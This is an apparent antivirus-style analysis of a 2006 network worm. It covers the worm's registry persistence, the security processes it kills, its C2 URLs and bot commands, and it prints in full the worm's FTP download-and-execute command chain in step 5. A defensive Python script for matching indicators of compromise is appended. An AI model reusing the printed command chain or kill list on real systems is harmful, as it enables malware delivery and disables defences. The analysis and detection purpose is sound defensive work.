Virus alias:
Processed: 2006-08-29
Threat level: ★
Chinese name: 网贼
Virus type: Worm
Affected systems: win9x/me, win2000/nt, winxp, win2003
Virus behavior:
This is a worm that spreads over the network. It attempts to update itself, opens a backdoor that accepts commands from a controller, terminates security software, and turns the infected machine into a network zombie (bot).
1. Creates the file:
%system%\mmsvc32.exe
2. Adds startup entries so that the virus runs at boot (registry key, then value name = value data):
hkcu\software\microsoft\windows\currentversion\run
    microsoftnetworkservicescontroller = mmsvc32.exe
hklm\software\microsoft\windows\currentversion\run
    microsoftnetworkservicescontroller = mmsvc32.exe
3. Searches for and closes the following windows (and their processes), then registers a window with the same name itself so that they cannot be started again:
dbmwin
tdbmwin
4. Deletes the following registry values (registry key, then value name):
hkcu\software\microsoft\windows\currentversion\run
    microsoftiis
hkcu\software\microsoft\windows\currentversion\run
    paytime
hkcu\software\microsoft\windows\currentversion\run
    lp3mr1sh
5. Creates a thread that runs the following command (spacing restored from the extracted text). The echo lines write an FTP script to ntsdd.txt, ftp -s: runs that script to fetch mmf32.exe, the script file is deleted, and the downloaded file is executed:
cmd.exe /c echo user nnpy@web.cplnn.com > ntsdd.txt
&& echo f729lqjd >> ntsdd.txt
&& echo binary >> ntsdd.txt
&& echo get mmf32.exe >> ntsdd.txt
&& echo quit >> ntsdd.txt
&& ftp -s:ntsdd.txt -n nnpyf.cplnn.com
&& del ntsdd.txt
&& mmf32.exe
6. Runs the following commands to terminate security software processes:
!proc.kill.*ftp.exe
!proc.kill.*tftp.exe
!proc.kill.*nh.exe
!proc.kill.*nethost.exe
!proc.kill.*syshost.exe
!proc.kill.*ppc.exe
!proc.kill.*paytime.exe
!proc.kill.*lp3mr1sh.exe
!proc.kill.*tibs.exe
!proc.kill.*opera.exe
!proc.kill.*netscape.exe
7. Attempts to connect to the following addresses:
http://nnpy.cplnn.com/lipscr2.php
http://dnsf.nnctx.com.ru/ipconf.cfg
http://nnpyev.nnctx.com.ru/wad/nnpy.txt
http://www.ppwex.com/sdata.txt
http://wlog.cplnn.com/wlog.php?action=knock
8. Accepts the following commands from the controller:
!http.dos
!udp.ddos
!proc.kill
!run
!url.download
!update
!aftp.config
!url.spoof
!ie.counter
9. Attempts to download the following files:
http://web.cplnn.com/bbot.exe
http://web.cplnn.com/psvc.exe
http://www.gmz41-soft.com/vxupd.exe
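The indicators above (the dropped file and Run-key value from steps 1 and 2, the window names from step 3, and the hosts from steps 7 and 9) can be checked against host and proxy evidence in one pass. The script below is an added example for this report, not code from the vendor page: it parses a `reg export`-style dump of the Run keys, a proxy log, and a list of window titles, and reports which of the report's indicators appear. The parsers and the sample inputs are constructed for this example; the indicator values themselves are taken from the report.

```python
"""Triage of host and proxy artifacts against the indicators in this report.

Added example: the indicator values come from the report above; the input
formats (a `reg export`-style dump, a proxy log, window titles) and the
sample data are constructed for illustration.
"""
import re
from urllib.parse import urlsplit

# Indicators listed in the report.
DROPPED_FILE = "mmsvc32.exe"
RUN_VALUE_NAME = "microsoftnetworkservicescontroller"
RUN_KEYS = {
    r"hkcu\software\microsoft\windows\currentversion\run",
    r"hklm\software\microsoft\windows\currentversion\run",
}
WINDOW_NAMES = {"dbmwin", "tdbmwin"}   # step 3: windows the worm closes and then registers itself
REPORTED_URLS = (
    "http://nnpy.cplnn.com/lipscr2.php",
    "http://dnsf.nnctx.com.ru/ipconf.cfg",
    "http://nnpyev.nnctx.com.ru/wad/nnpy.txt",
    "http://www.ppwex.com/sdata.txt",
    "http://wlog.cplnn.com/wlog.php?action=knock",
    "http://web.cplnn.com/bbot.exe",
    "http://web.cplnn.com/psvc.exe",
    "http://www.gmz41-soft.com/vxupd.exe",
)
CONTACTED_HOSTS = {urlsplit(u).hostname for u in REPORTED_URLS}

HIVE_ABBREV = {"hkey_current_user": "hkcu", "hkey_local_machine": "hklm"}


def normalize_key(key):
    """Lower-case a registry path and abbreviate the hive, e.g. HKEY_CURRENT_USER -> hkcu."""
    key = key.strip("[]").lower()
    hive, sep, rest = key.partition("\\")
    return HIVE_ABBREV.get(hive, hive) + sep + rest


def parse_reg_export(text):
    """Yield (key, value_name, data) for string values in reg-export-style text (minimal parser)."""
    key = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = normalize_key(line)
        elif key and line.startswith('"'):
            m = re.match(r'^"([^"]*)"="(.*)"$', line)
            if m:
                yield key, m.group(1).lower(), m.group(2).lower()


def find_run_entries(reg_text):
    """Run-key values matching the report: the value name, or data that launches the dropped file."""
    return [
        (key, name, data)
        for key, name, data in parse_reg_export(reg_text)
        if key in RUN_KEYS and (name == RUN_VALUE_NAME or data.endswith(DROPPED_FILE))
    ]


def find_beacons(log_text):
    """(host, url) for proxy-log lines whose URL host is one the worm contacts or downloads from."""
    hits = []
    for line in log_text.splitlines():
        for url in re.findall(r"https?://\S+", line):
            host = urlsplit(url).hostname
            if host in CONTACTED_HOSTS:
                hits.append((host, url))
    return hits


def find_window_names(titles):
    """Window names from step 3 present on the host; worth a look whether they belong to the
    legitimate tool or to the worm's decoy window."""
    return sorted({t.lower() for t in titles} & WINDOW_NAMES)


def triage(reg_text, log_text, window_titles):
    """Run all three checks and return the findings grouped by artifact type."""
    return {
        "run_entries": find_run_entries(reg_text),
        "beacons": find_beacons(log_text),
        "windows": find_window_names(window_titles),
    }


# Constructed sample inputs (not from the report).
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"MicrosoftNetworkServicesController"="mmsvc32.exe"
"SomeUpdater"="C:\\Program Files\\Vendor\\updater.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\System32\\SecurityHealthSystray.exe"
"""

SAMPLE_PROXY_LOG = """\
2006-08-29T08:12:01 192.0.2.10 GET http://wlog.cplnn.com/wlog.php?action=knock 200
2006-08-29T08:12:03 192.0.2.10 GET http://www.example.com/index.html 200
2006-08-29T08:12:09 192.0.2.10 GET http://web.cplnn.com/bbot.exe 200
"""

SAMPLE_WINDOWS = ["Calculator", "tdbmwin"]

if __name__ == "__main__":
    for category, hits in triage(SAMPLE_REG, SAMPLE_PROXY_LOG, SAMPLE_WINDOWS).items():
        print(category, hits)
```

On a real host the Run keys would come from `reg export` of the two keys listed in step 2, and the proxy log from whatever web gateway the network uses; the `find_beacons` match is on hostname only, so the knock to wlog.cplnn.com is caught even if the query string differs.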